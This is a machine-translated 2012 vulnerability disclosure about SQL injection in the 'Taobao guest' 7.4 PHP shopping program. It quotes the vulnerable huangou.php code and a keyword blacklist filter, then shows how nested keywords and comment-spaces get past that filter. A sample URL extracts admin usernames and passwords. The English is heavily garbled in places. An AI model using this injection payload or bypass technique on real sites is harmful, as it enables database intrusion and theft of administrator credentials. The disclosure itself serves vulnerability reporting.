A lot of Taobao guest 7. 4 SQL injection bypass vulnerability-vulnerability warning-the black bar safety net

2012-03-23T00:00:00
ID MYHACK58:62201233423
Type myhack58
Reporter 佚名
Modified 2012-03-23T00:00:00

Description

Brief description:

See before someone made a lot of this procedure of injecting

http://www.wooyun.org/bugs/wooyun-2010-04024

Look at the source code, almost naked injection?:

$id =$_GET['id'];

$good=sel_sql('dhlist','id,name,pic,money,jifen,num,content,num','id='.$ id);

OK, OK!! See online that lot and storm of the vulnerability, the lower of the 2 Number 0 before the code to see for a while, found it interesting, and reflects a very serious problem, for everyone to learn from.

Detailed description:

Out of the 7. 4 3 month 2 0 Number before the code injection does not repair, 还是huangou.php

$id =$_GET['id'];

$good=sel_sql('dhlist','id,name,pic,money,jifen,num,content,num','id='.$ id);

But the test environment why the incident can't yet, at a closer look at the code, The original more contains

the include_once 'comm/checkpostandget.php';

This file content what is a pinch

$ArrFiltrate = array ( "#union#i", "#<script#i", "#/script>#i", "#select#i", "#alert#i", "#javascript#i", "#<table#i", "#<td#i", "#\"#i", "#\'#i", "#delete#i", "#vbscript#i", "#applet#i", "#of frame#i", "#<div#i", "#update#i", "#'#i", "#union #i", "#select #i", "#delete #i", "#update #i", "#and #i", "#;#i", "#update#i");$replacements=";function FunStringExist(&$array,$ArrFiltrate,$replacements){ if (is_array($array)) { foreach ($array as $key => $value) { if (is_array($value)) FunStringExist($array[$key],$ArrFiltrate,$replacements); else $array[$key] = preg_replace($ArrFiltrate, $replacements, $value); } }}FunStringExist($_GET,$ArrFiltrate,$replacements);FunStringExist($_POST,$ArrFiltrate,$replacements);

What a wonderful Ah, the original does not concentrate on repairing the vulnerability, but doing a get and post arrays of a global filter function, but you don't have to have a lot of problems? First do not say whether the source and target are complete, the individual is this logic there is a very big problem.

Vulnerability to prove:

Keywords such as: union, into uniounionn on the line, spaces./**/.

http://www.xxx.com/huangou.php?id=1//and//1=2//ununionion//seselectlect//0,1,2,adminname,adminpass,5,6,7//from/**/duoduo_duoduo2010

Repair solutions:

You should get it.